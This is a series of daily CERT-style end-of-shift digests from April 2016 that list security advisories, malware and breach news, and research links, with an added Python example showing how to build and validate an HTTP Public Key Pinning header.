Aleksandr Andreevich Panin, the Russian developer of the SpyEye botnet creation kit, and an associate were on Wednesday sentenced to prison terms by a court in Atlanta, Georgia, for their role in developing and distributing malware that is said to have caused millions of dollars in losses to the financial sector. Panin, who set out to develop SpyEye as a successor to the Zeus malware that affected financial institutions since 2009, was sentenced by the court to nine and a half years in prison,...
---------------------------------------------
http://www.cio.com/article/3059554/spyeye-botnet-kit-developer-sentenced-to…
*** Looking Into a Cyber-Attack Facilitator in the Netherlands ***
---------------------------------------------
A small webhosting provider with servers in the Netherlands and Romania has been a hotbed of targeted attacks and advanced persistent threats (APT) since early 2015. Starting from May 2015 till today we counted over 100 serious APT incidents that originated from servers of this small provider. Pawn Storm used the servers for at least 80 high profile attacks against various governments in the US, Europe, Asia, and the Middle East. Formally the Virtual Private Server (VPS) hosting company is...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/MKFUpCeHi9s/
*** FBI warns farming industry about equipment hacks, data breaches ***
---------------------------------------------
As Internet-connected equipment is increasingly used in many industry sectors, alerts like the latest one issued by the FBI to US farmers will likely become a regular occurrence. While precision agriculture technology (a.k.a. smart farming) reduces farming costs and increases crop yields, farmers need to be aware of and understand the associated cyber risks to their data and ensure that companies entrusted to manage their data, including digital management tool and application developers...
---------------------------------------------
https://www.helpnetsecurity.com/2016/04/21/farming-cyber-risks/
*** Lab - Cryptographic Algorithms ***
---------------------------------------------
For this lab we'll be using GPG and OpenSSL to demonstrate symmetric and asymmetric encryption/decryption, and MD5 and SHA1 to demonstrate hash functions. Virtual Machine Needed: Kali. Before starting the lab here are some definitions: In all symmetric crypto algorithms (also called Secret Key encryption) a secret key is used both to encrypt the plaintext and to decrypt the...
---------------------------------------------
http://resources.infosecinstitute.com/lab-cryptographic-algorithms/
*** Xenophobic printouts: "hacker attack" on university printers ***
---------------------------------------------
Hacker attack or just a wrong printer configuration: at various universities in Germany, documents with xenophobic content have been found in the printers.
---------------------------------------------
http://www.golem.de/news/fremdenfeindliche-ausdrucke-hackerangriff-auf-univ…
*** Security update available for the Adobe Analytics AppMeasurement for Flash Library ***
---------------------------------------------
A Security Bulletin (APSB16-13) has been published regarding a security update for the Adobe Analytics AppMeasurement for Flash Library. This update resolves an important vulnerability in the AppMeasurement for Flash library that could be abused to conduct DOM-based cross-site scripting attacks...
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1341
*** DFN-CERT-2016-0655: Squid: Multiple vulnerabilities allow, among other things, the execution of arbitrary code ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-0655/
*** [R2] Nessus < 6.6 Fixes Two Vulnerabilities ***
---------------------------------------------
http://www.tenable.com/security/tns-2016-08
*** Moxa NPort Device Vulnerabilities (Update A) ***
---------------------------------------------
This alert update is a follow-up to the original NCCIC/ICS-CERT Alert titled ICS-ALERT-16-099-01 Moxa NPort Device Vulnerabilities that was published April 8, 2016, on the ICS-CERT web page. ICS-CERT is aware of a public report of vulnerabilities affecting multiple models of the Moxa NPort device. ICS-CERT has notified Moxa of the report, and Moxa has validated all five of the reported vulnerabilities.
---------------------------------------------
https://ics-cert.us-cert.gov/alerts/ICS-ALERT-16-099-01
*** Hyper-V - vmswitch.sys VmsMpCommonPvtHandleMulticastOids Guest to Host Kernel-Pool Overflow ***
---------------------------------------------
Topic: Hyper-V - vmswitch.sys VmsMpCommonPvtHandleMulticastOids Guest to Host Kernel-Pool Overflow
Risk: High
Text: /* This function is reachable by sending a RNDIS Set request with OID 0x01010209 (OID_802_3_MULTICAST_LIST) from the Guest to...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016040133
*** Avast SandBox Escape via IOCTL Requests ***
---------------------------------------------
Topic: Avast SandBox Escape via IOCTL Requests
Risk: Medium
Text: * CVE: CVE-2016-4025 * Vendor: Avast * Reported by: Kyriakos Economou * Date of Release: 19/04/2016 * Affected Products: Mu...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016040134
*** Cisco Security Advisories ***
---------------------------------------------
*** Cisco Wireless LAN Controller Management Interface Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Wireless LAN Controller Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Adaptive Security Appliance Software DHCPv6 Relay Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Wireless LAN Controller HTTP Parsing Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Multiple Cisco Products libSRTP Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in OpenSSL affects IBM Tivoli Netcool System Service Monitors/Application Service Monitors (CVE-2016-0800) ***
http://www.ibm.com/support/docview.wss?uid=swg21980721
---------------------------------------------
*** IBM Security Bulletin: A vulnerability in libcURL affects IBM Tivoli Netcool System Service Monitors/Application Service Monitors (CVE-2015-3237) ***
http://www.ibm.com/support/docview.wss?uid=swg21980719
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM Tivoli Netcool System Service Monitors/Application Service Monitors (CVE-2015-3197, CVE-2015-4000) ***
http://www.ibm.com/support/docview.wss?uid=swg21980716
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM Tivoli Netcool System Service Monitors/Application Service Monitors (CVE-2015-3194, CVE-2015-3195, CVE-2015-3196) ***
http://www.ibm.com/support/docview.wss?uid=swg21980714
---------------------------------------------
*** IBM Security Bulletin: Current Releases of IBM® SDK for Node.js™ are affected by CVE-2015-8851 ***
http://www.ibm.com/support/docview.wss?uid=swg21981528
---------------------------------------------
*** IBM Security Bulletin: IBM Spectrum Scale, with the Spectrum Scale GUI installed, is affected by a security vulnerability (CVE-2016-0361) ***
http://www.ibm.com/support/docview.wss?uid=ssg1S1005742
---------------------------------------------
*** Drupal Security Advisories for Third-Party Modules ***
---------------------------------------------
*** EPSA Crop - Image Cropping - Critical - XSS - SA-CONTRIB-2016-024 - Unsupported ***
https://www.drupal.org/node/2710247
---------------------------------------------
*** Organic groups - Moderately Critical - Access bypass - DRUPAL-SA-CONTRIB-2016-023 ***
https://www.drupal.org/node/2710115
---------------------------------------------
*** Search API - Moderately Critical - Multiple Vulnerabilities - SA-CONTRIB-2016-022 ***
https://www.drupal.org/node/2710063
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 19-04-2016 18:00 − Wednesday 20-04-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Oracle critical updates released, (Wed, Apr 20th) ***
---------------------------------------------
Oracle has released their critical updates list. Looking through it, there is a very wide range of products, including Java, that require a fix. Oracle strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes without delay. There are quite a few remotely exploitable, no-auth-required issues that are addressed by these patches. You may want to peruse the list to see if some of your products are affected.
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20965&rss
*** Java: New JDK versions bring stricter security requirements ***
---------------------------------------------
The JDK 8u91 and 8u92 updates once again focus primarily on security: among other things, the MD5 algorithm is now considered insecure, and the JVM gets settings for handling out-of-memory errors.
---------------------------------------------
http://heise.de/-3178164
*** Hacking and manipulating traffic sensors ***
---------------------------------------------
With the advent of the Internet of Things, we're lucky to have researchers looking into these devices and pointing out the need for securing them better. One of these researchers is Kaspersky Lab's Denis Legezo, who took it upon himself to map the traffic sensors in Moscow and see whether they could be tampered with. The answer to that question is yes, they can be manipulated, and consequently lead to poor traffic management and annoyance...
---------------------------------------------
https://www.helpnetsecurity.com/2016/04/20/hacking-manipulating-traffic-sen…
*** PoS Malware Steals Credit Card Numbers via DNS Requests ***
---------------------------------------------
A new version of the NewPosThings PoS malware is using a clever technique to extract data from infected PoS terminals that almost no security solution monitors for malware activity.
---------------------------------------------
http://news.softpedia.com/news/pos-malware-steals-credit-card-numbers-via-d…
*** Using a Braun Shaver to Bypass XSS Audit and WAF ***
---------------------------------------------
TL;DR: Sometimes you just need to spend a couple of months to exploit a XSS with a hygiene product.
---------------------------------------------
https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-aud…
*** Encryption everywhere? ***
---------------------------------------------
This article discusses opportunistic encryption (OE), ways to set up systems so that they will automatically encrypt whenever they can rather than just whenever the user requests it. Many types of encryption require a choice by the user - encrypt with PGP rather than sending email in the clear, log into a remote system with...
---------------------------------------------
http://resources.infosecinstitute.com/encryption-everywhere/
*** Towards Generic Ransomware Detection ***
---------------------------------------------
I'm not claiming these ideas are novel, nor unbeatable. My goal is simply to raise awareness about alternate means to help stymie the ransomware epidemic. Plus, attempting to write a tool that could generically protect my computer against OS X ransomware seemed like a fun challenge! Finally, both this research and tool are version 1.0, meaning there is likely room for improvement - so feedback is welcome :)
---------------------------------------------
https://objective-see.com/blog/blog_0x0F.html
*** DRAM bitflipping exploits that hijack computers just got easier ***
---------------------------------------------
Approach relies on already installed code, including widely used glibc library.
---------------------------------------------
http://arstechnica.com/security/2016/04/dram-bitflipping-exploits-that-hija…
*** Panama Papers - How Hackers Breached the Mossack Fonseca Firm ***
---------------------------------------------
Introduction: The Panama Papers are a huge trove of highly confidential documents stolen from the computer systems of the Panamanian law firm Mossack Fonseca that was recently leaked online. It is considered the largest data leak ever; the entire archive contains more than 11.5 million files including 2.6 terabytes of data related to the activities of offshore...
---------------------------------------------
http://resources.infosecinstitute.com/panama-papers-how-hackers-breached-th…
*** Kippo and dshield, (Tue, Apr 19th) ***
---------------------------------------------
In this diary I will talk about how to configure the kippo honeypot and how to submit your kippo logs to SANS Dshield.
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20963&rss
*** Security Update for Microsoft Graphics Component (3148522) Version: 2.0 ***
---------------------------------------------
V2.0 (April 19, 2016): To comprehensively address CVE-2016-0145, Microsoft re-released security update 3144432 for affected editions of Microsoft Live Meeting 2007 Console. Customers running Microsoft Live Meeting 2007 Console should install the update to be fully protected from the vulnerability. See Microsoft Knowledge Base Article 3144432 for more information.
---------------------------------------------
https://technet.microsoft.com/en-us/library/security/MS16-039
*** Bugtraq: ESA-2016-039: EMC ViPR SRM Multiple Cross-Site Request Forgery Vulnerabilities ***
---------------------------------------------
http://www.securityfocus.com/archive/1/538133
*** Cisco IOS and Cisco IOS XE ntp Subsystem Unauthorized Access Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** F5 Security Advisory: glibc vulnerability CVE-2015-8779 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/39/sol39250133.html?…
*** VMSA-2016-0002.1 ***
---------------------------------------------
VMware product updates address a critical glibc security vulnerability
---------------------------------------------
http://www.vmware.com/security/advisories/VMSA-2016-0002.html
*** VMSA-2015-0009.2 ***
---------------------------------------------
VMware product updates address a critical deserialization vulnerability
---------------------------------------------
http://www.vmware.com/security/advisories/VMSA-2015-0009.html
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 18-04-2016 18:00 − Tuesday 19-04-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Touch ID: 90 percent of iPhone users now rely on a passcode lock ***
---------------------------------------------
Since the introduction of the fingerprint scanner, according to Apple, the share of users who protect their iPhone with a device passcode, and thereby encrypt their data, has doubled.
---------------------------------------------
http://heise.de/-3177095
*** JavaScript-toting spam emails: What should you know and how to avoid them? ***
---------------------------------------------
We have recently observed that spam campaigns are now using JavaScript attachments aside from Office files. The purpose of the code is straightforward. It downloads and runs other malware. Some of the JavaScript downloaders ..
---------------------------------------------
https://blogs.technet.microsoft.com/mmpc/2016/04/18/javascript-toting-spam-…
*** Google Alerts, Direct Webmaster Communication Get Bugs Fixed Quickly ***
---------------------------------------------
Google determined that Safe Browsing warnings correlate with quicker remediation times, though not as quick as direct contact with webmasters who have registered with Google Search Console.
---------------------------------------------
http://threatpost.com/google-alerts-direct-webmaster-communication-get-bugs…
*** Magnitude EK Activity At Its Highest Via AdsTerra Malvertising ***
---------------------------------------------
The Magnitude exploit kit is maximizing its leads via a large and uninterrupted malvertising campaign.
---------------------------------------------
https://blog.malwarebytes.org/threat-analysis/exploits-threat-analysis/2016…
*** iPrint Appliance 2.0 Patch 1 ***
---------------------------------------------
Abstract: Patch 1 for the iPrint Appliance 2.0 includes bug fixes.
Document ID: 5240661
Security Alert: Yes
Distribution Type: Public
Entitlement Required: No
Files: iPrint-2.0.0.530.HP.zip (594.99 MB)
Products: iPrint Appliance 2
Superseded Patches: iPrint Appliance 2.0 FTF
---------------------------------------------
https://download.novell.com/Download?buildid=W46YTfqEGiQ~
*** Symantec Messaging Gateway Multiple Security Issues ***
---------------------------------------------
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se…
*** Python-Based PWOBot Targets European Organizations ***
---------------------------------------------
We have discovered a malware family named 'PWOBot' that is fairly unique because it is written entirely in Python, and compiled via PyInstaller to generate a Microsoft Windows ..
---------------------------------------------
http://researchcenter.paloaltonetworks.com/2016/04/unit42-python-based-pwob…
*** Numbers, please! 390,000 new malware programs every day ***
---------------------------------------------
At the moment one gets the feeling that some piece of malware is hiding in every email attachment and behind every link. Antivirus vendors and test labs reinforce this impression with absurdly high counts of new malware programs.
---------------------------------------------
http://heise.de/-3177141
*** Over 550 million records affected by security breaches in 2015 ***
---------------------------------------------
Number of publicly known zero-day vulnerabilities more than doubled – developers are getting faster at fixing them
---------------------------------------------
http://derstandard.at/2000035195204
*** How-To Disable Windows Script Host ***
---------------------------------------------
Numerous spam campaigns are pushing various crypto-ransomware families (and backdoors) via .zip file attachments. And such .zip files typically contain a JScript (.js/.jse) file that, if clicked, will be run via Windows Script Host. Do yourself a favor and edit your Windows Registry ..
---------------------------------------------
https://labsblog.f-secure.com/2016/04/19/how-to-disable-windows-script-host/
*** Exploit kit writers turn away from Java, go all-in on Adobe Flash ***
---------------------------------------------
312% increase in Flash vulns over 2014, says study. Exploit kit writers are no longer fussed about Java vulnerabilities, focusing their attention almost entirely on Adobe Flash.
---------------------------------------------
www.theregister.co.uk/2016/04/19/exploit_kit_writers_love_flash/
*** Homeland Security: Open source serves domestic security ***
---------------------------------------------
Disclosing code has advantages for "cybersecurity" and will help protect the nation from threats, says the chief technology officer of the responsible US agency. In addition, citizens could oversee the agency better thanks to open source, developers believe.
---------------------------------------------
http://www.golem.de/news/homeland-security-open-source-dient-der-inneren-si…
*** Citrix XenServer: multiple security vulnerabilities (CTX209443) ***
---------------------------------------------
A number of security vulnerabilities have been identified in Citrix XenServer. The following vulnerabilities have been addressed: ...
---------------------------------------------
http://support.citrix.com/article/CTX209443
*** Devious PayPal phishing with a purported Eventim invoice ***
---------------------------------------------
An unusually well-made phishing email is meant to lure PayPal customers into a data trap. The senders have even tampered with the header.
---------------------------------------------
http://heise.de/-3177745
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 15-04-2016 18:00 − Monday 18-04-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Bugtraq: [SECURITY] [DSA 3550-1] openssh security update ***
---------------------------------------------
http://www.securityfocus.com/archive/1/538099
*** Out-of-date apps put 3 million servers at risk of crypto ransomware infections ***
---------------------------------------------
1,600 schools, governments, and aviation companies already backdoored.
---------------------------------------------
http://arstechnica.com/security/2016/04/3-million-servers-are-sitting-ducks…
*** Chrome extensions will soon have to tell you what data they collect ***
---------------------------------------------
Google is about to make it harder for Chrome extensions to collect your browsing data without letting you know about it, according to a new policy announced Friday. Starting in mid-July, developers releasing Chrome extensions ..
---------------------------------------------
http://www.cio.com/article/3057259/chrome-extensions-will-soon-have-to-tell…
*** How to Write Phishing Templates That Work ***
---------------------------------------------
Phish Me Once. Phishing isn't hard. Despite all the frightening news reports about ransomware and millions of stolen dollars and identities, people still happily click ..
---------------------------------------------
http://resources.infosecinstitute.com/how-to-write-phishing-templates-that-…
*** ZDI-16-244: Hewlett Packard Enterprise Vertica validateAdminConfig Remote Command Injection Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett Packard Enterprise Vertica. Authentication is not required to exploit this vulnerability.
---------------------------------------------
www.zerodayinitiative.com/advisories/ZDI-16-244/
*** ZDI-16-243: Google Chrome Pdfium JPEG2000 Out-Of-Bounds Read Information Disclosure Vulnerability ***
---------------------------------------------
This vulnerability allows an attacker to leak sensitive information on vulnerable installations of Google Chrome. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-16-243/
*** Splunk Enterprise Multiple Flaws Let Remote Users Bypass Security and Deny Service and Remote Authenticated Users Execute Arbitrary Code ***
---------------------------------------------
http://www.securitytracker.com/id/1035578
*** 'Blackhole' Exploit Kit Author Gets 7 Years ***
---------------------------------------------
A Moscow court this week convicted and sentenced seven hackers for breaking into countless online bank accounts -- including "Paunch," the nickname used by the author of the infamous "Blackhole" exploit kit. Once an extremely ..
---------------------------------------------
http://krebsonsecurity.com/2016/04/blackhole-exploit-kit-author-gets-8-year…
*** DSA-3551 fuseiso - security update ***
---------------------------------------------
It was discovered that fuseiso, a user-space implementation of the ISO 9660 file system based on FUSE, contains several vulnerabilities.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3551
*** leenk.me <= 2.5.0 - XSS and CSRF ***
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8457
*** DSA-3552 tomcat7 - security update ***
---------------------------------------------
Multiple security vulnerabilities have been discovered in the Tomcat servlet and JSP engine, which may result in information disclosure, the bypass of CSRF protections and bypass of the SecurityManager.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3552
*** FAQ WD <= 1.0.14 - Cross-Site Scripting (XSS) ***
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8455
*** e-search <= 1.0 - Unauthenticated Reflected Cross-Site Scripting (XSS) ***
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8458
*** Hacking Team hacker explains how he did it ***
---------------------------------------------
Some nine months ago, a hacker who calls himself Phineas Fisher managed to breach the systems and networks of Hacking Team, the (in)famous Italian company that provides offensive intrusion and surveillance software to ..
---------------------------------------------
https://www.helpnetsecurity.com/2016/04/18/hacking-team-hacker-explains/
*** Eavesdropping protection: Web.de additionally secures mail transport with DANE ***
---------------------------------------------
The step is significant because Web.de is not only one of the big German freemail services, but also because its parent company United Internet belongs to the "E-Mail made in Germany" initiative, which admittedly has gone rather quiet of late.
---------------------------------------------
http://heise.de/-3175333
*** Remote code execution, git, and OS X ***
---------------------------------------------
Sometimes I think about all of those pictures which show a bunch of people in startups. They have their office space, which might be big, or it might be small, but they tend to have Macs. Lots of Macs. A lot of them also use git to ..
---------------------------------------------
https://rachelbythebay.com/w/2016/04/17/unprotected/
*** Oracle Critical Patch Update Pre-Release Announcement - April 2016 ***
---------------------------------------------
This Critical Patch Update Pre-Release Announcement provides advance information about the Oracle Critical Patch Update for April 2016, which will be released on Tuesday, April 19, 2016. While this Pre-Release Announcement is as accurate ..
---------------------------------------------
http://www.oracle.com/technetwork/topics/security/cpuapr2016-2881694.html
*** Idiot millennials are saving credit card PINs on their mobile phones ***
---------------------------------------------
Cleartext passwords are bad, kids, mmmkay? More than one in five 18-24 year olds (21 per cent) store PINs for credit or debit cards on their smartphones, tablets or laptops, according to research conducted by Equifax in conjunction with Gorkana.
---------------------------------------------
www.theregister.co.uk/2016/04/18/storing_passwords_smartphone_bad_mkay/
*** Implementation of a Virtual IDS Device in Passive Mode ***
---------------------------------------------
The arrival of server, desktop and network virtualization has brought along enormous flexibility in configuration options and a huge drop in installation and operating costs of IT networks. Due ..
---------------------------------------------
http://resources.infosecinstitute.com/implementation-of-a-virtual-ids-devic…
*** Academic network Janet clobbered with DDoS attacks - again ***
---------------------------------------------
Funny how it always gets targeted at the end of term... Blighty's government-funded educational network Janet has once again been hit by a cyber attack, with a fresh ..
---------------------------------------------
www.theregister.co.uk/2016/04/18/janet_clobbered_with_ddos_attacks_again/
*** Upper Austrian company falls for internet fraudsters while buying a tractor ***
---------------------------------------------
40,000 euro in damages; the website of a British supplier was "faked"
---------------------------------------------
http://derstandard.at/2000035121122
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 14-04-2016 18:00 − Friday 15-04-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Cisco Unified Computing System Platform Emulator Command Injection Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco Unified Computing System Platform Emulator Filename Argument Handling Buffer Overflow Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Purported Flash update installs unwanted Mac programs ***
---------------------------------------------
Once again an installer disguised as a Flash update is circulating that installs unwanted OS X programs. A developer certificate keeps the Gatekeeper protection feature quiet.
---------------------------------------------
http://heise.de/-3174793
*** Bedep has raised its game vs Bot Zombies ***
---------------------------------------------
http://malware.dontneedcoffee.com/2016/04/bedepantiVM.html
*** Xen hugetlbfs Support Lets Local Users on a Guest System Cause Denial of Service Conditions on the Guest System ***
---------------------------------------------
http://www.securitytracker.com/id/1035569
*** Banking Trojans Nymaim, Gozi Merge to Steal $4M ***
---------------------------------------------
'Double-headed beast' Trojan, GozNym, drains $4 million from banks in past two weeks.
---------------------------------------------
http://threatpost.com/banking-trojans-nymaim-gozi-merge-to-steal-4m/117412/
*** Ransomware authors use the bitcoin blockchain to deliver encryption keys ***
---------------------------------------------
Ransomware authors are using the bitcoin blockchain, which serves as the cryptocurrency's public transaction ledger, to deliver decryption keys to victims. The technique, which removes the burden of maintaining a reliable website-based ..
---------------------------------------------
http://www.cio.com/article/3056604/ransomware-authors-use-the-bitcoin-block…
*** VMSA-2016-0004 ***
---------------------------------------------
VMware product updates address a critical security issue in the VMware Client Integration Plugin
---------------------------------------------
http://www.vmware.com/security/advisories/VMSA-2016-0004.html
*** HTTP Public Key Pinning: How to do it right, (Thu, Apr 14th) ***
---------------------------------------------
[Thanks to Felix aka @nexusnode for inspiring this post. Also, see his blog post [1] for more details] One of the underutilized security measures I mentioned recently was HTTP Public Key Pinning, or HPKP. First again, what is HPKP: HPKP adds a special header to the HTTP response. This header lists hashes ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20943
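The mechanism the diary describes, worked through as an added example (not code from the ISC post): a pin is the base64 of the SHA-256 over the DER-encoded SubjectPublicKeyInfo, the header carries at least two such pins plus a max-age, and a client only notes the pins when one of them matches the served chain and another one does not (the backup key RFC 7469 requires). The SPKI byte strings below are constructed stand-ins, not real keys; on a live host you would extract the SPKI from the certificate instead.

```python
import base64
import hashlib
import re
from typing import List, Optional


def pin_sha256(spki_der: bytes) -> str:
    """HPKP pin: base64(SHA-256(DER SubjectPublicKeyInfo)), as defined in RFC 7469."""
    return base64.b64encode(hashlib.sha256(spki_der).digest()).decode("ascii")


def build_hpkp_header(pins: List[str], max_age: int, include_subdomains: bool = False,
                      report_uri: Optional[str] = None) -> str:
    """Assemble a Public-Key-Pins header value.

    Refuses fewer than two distinct pins: RFC 7469 requires a backup pin, and a
    site that pins only its current key locks out every returning client for
    max-age seconds the moment that key is rotated or revoked.
    """
    pins = list(dict.fromkeys(pins))          # drop duplicates, keep order
    if len(pins) < 2:
        raise ValueError("HPKP needs at least two pins, one of them a backup key")
    if max_age <= 0:
        raise ValueError("max-age must be a positive number of seconds")
    parts = [f'pin-sha256="{p}"' for p in pins] + [f"max-age={max_age}"]
    if include_subdomains:
        parts.append("includeSubDomains")
    if report_uri:
        parts.append(f'report-uri="{report_uri}"')
    return "; ".join(parts)


_PIN_RE = re.compile(r'pin-sha256="([A-Za-z0-9+/]+={0,2})"')


def parse_hpkp_header(value: str):
    """Return (pins, max_age, include_subdomains) parsed from a header value."""
    pins = _PIN_RE.findall(value)
    max_age, include_subdomains = None, False
    for directive in value.split(";"):
        d = directive.strip()
        if d.lower().startswith("max-age="):
            max_age = int(d.split("=", 1)[1])
        elif d.lower() == "includesubdomains":
            include_subdomains = True
    return pins, max_age, include_subdomains


def client_accepts(header_value: str, served_chain_spkis: List[bytes]) -> Optional[List[str]]:
    """Mimic the RFC 7469 client rule: note the pins only if at least one pin
    matches a key in the validated chain AND at least one does not (the backup).
    Returns the matching pins, or None when the header must be ignored."""
    pins, max_age, _ = parse_hpkp_header(header_value)
    if len(pins) < 2 or not max_age:
        return None
    chain = {pin_sha256(spki) for spki in served_chain_spkis}
    matching = [p for p in pins if p in chain]
    if not matching or len(matching) == len(pins):
        return None
    return matching


# Constructed stand-ins for DER SubjectPublicKeyInfo blobs (not real keys).
# On a real host the SPKI comes out of the certificate, e.g.
#   openssl x509 -in leaf.pem -pubkey -noout | openssl pkey -pubin -outform der \
#     | openssl dgst -sha256 -binary | base64
LEAF_SPKI = b"constructed leaf SubjectPublicKeyInfo"
BACKUP_SPKI = b"constructed offline backup SubjectPublicKeyInfo"


def example_header() -> str:
    """Two pins (current leaf key plus an offline backup key), 60 days, subdomains included."""
    return build_hpkp_header([pin_sha256(LEAF_SPKI), pin_sha256(BACKUP_SPKI)],
                             max_age=60 * 24 * 3600, include_subdomains=True)


if __name__ == "__main__":
    hdr = example_header()
    print("Public-Key-Pins:", hdr)
    print("client notes pins:", client_accepts(hdr, [LEAF_SPKI]))
```

The check in client_accepts is the reason "doing it right" means generating the backup key pair before deploying the header and keeping it offline: without a second pin the header is silently ignored by conforming clients, and with only the live key pinned a key rotation bricks the site. Browsers have since dropped HPKP (Chrome removed it in version 72), largely because of that footgun.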
*** Researchers Crack Microsoft and Google's Shortened URLs to Spy on People ***
---------------------------------------------
They were even able to identify a young woman who'd sought Google Maps directions to a Planned Parenthood clinic.
---------------------------------------------
http://www.wired.com/2016/04/researchers-cracked-microsoft-googles-shortene…
*** Russia sends exploit kit author to the GULAG for seven years ***
---------------------------------------------
♫ Mothers, don't let your babies grow up to be hackers ♫ The author of the infamous "Blackhole" exploit kit has been sentenced to seven years in a Russian penal colony, local media report.
---------------------------------------------
www.theregister.co.uk/2016/04/15/blackhole_paunch_sentence/
*** OGH: Business owner himself at fault for "phishing" attack on his account ***
---------------------------------------------
http://derstandard.at/2000034923248-406
*** AJAX Random Post <= 2.00 - Unauthenticated Reflected Cross-Site Scripting (XSS) ***
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8450
*** HDW WordPress Video Gallery <= 1.2 - Unauthenticated Reflected Cross-Site Scripting (XSS) ***
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8449
*** BlackBerry: Canadian police have held a master key since 2010 ***
---------------------------------------------
Used over the years to read millions of BBM messages
---------------------------------------------
http://derstandard.at/2000034940341
*** Sierra Wireless ACEmanager Information Exposure Vulnerability ***
---------------------------------------------
This advisory contains mitigation details for an exposure of sensitive information vulnerability in the Sierra Wireless ACEmanager application.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-105-01
*** Accuenergy Acuvim II Series AXM-NET Module Vulnerabilities ***
---------------------------------------------
This advisory contains mitigation details for authentication bypass vulnerabilities in Accuenergy's Acuvim II Series AXM-NET module.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-105-02
*** Uninstall QuickTime on Windows - NOW! ***
---------------------------------------------
Since two critical holes gape in QuickTime for Windows and Apple no longer supports the application, ..
---------------------------------------------
http://heise.de/-3175518
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 13-04-2016 18:00 − Thursday 14-04-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Cisco Unified Computing System Central Software Arbitrary Command Execution Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** JSA10733 - 2016-04 Security Bulletin: ScreenOS: Multiple Vulnerabilities in OpenSSL ***
---------------------------------------------
http://kb.juniper.net/index?page=content&id=JSA10733&actp=RSS
*** JSA10747 - 2016-04 Security Bulletin: QFX Series: PFE panic while processing VXLAN packets (CVE-2016-1274) ***
---------------------------------------------
http://kb.juniper.net/index?page=content&id=JSA10747&actp=RSS
*** JSA10735 - 2016-04 Security Bulletin: CTP Series: Multiple vulnerabilities in CTP Series ***
---------------------------------------------
http://kb.juniper.net/index?page=content&id=JSA10735&actp=RSS
*** Cisco Catalyst Switches Network Mobility Services Protocol Port Information Disclosure Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Juniper bleeding data and money: slaps Band-Aids all over Junos OS and warns markets ***
---------------------------------------------
Security fixes for privilege escalation, DoS, TLS spoofing and more. Juniper's code reviewers have been hard at work and have shipped a bunch of security bug fixes.
---------------------------------------------
www.theregister.co.uk/2016/04/14/juniper_drops_a_bunch_of_junos_os_security…
*** Hackers hacking hackers to knacker white hat cracker trackers ***
---------------------------------------------
These Russians speak really good Farsi, and other signs thieves lack honour. ACSC2016: Malware writers are selling each other out to white hats and hacking through each other's infrastructure to frame rivals, Shadowserver's Richard Perlotto says.
---------------------------------------------
www.theregister.co.uk/2016/04/14/there_is_no_honour_among_thieves/
*** Decryption tool available? Website identifies ransomware ***
---------------------------------------------
Victims of crypto-ransomware can identify the malware on the ID Ransomware website and, among other things, get information on whether free decryption is possible.
---------------------------------------------
http://heise.de/-3173463
*** "The Bundestrojaner is state-made malware" ***
---------------------------------------------
For IT expert Rene Pfeiffer, the state's spyware is not a suitable means for ..
---------------------------------------------
http://derstandard.at/2000034779830
*** Hacker brings "Flappy Bird" to the e-cigarette ***
---------------------------------------------
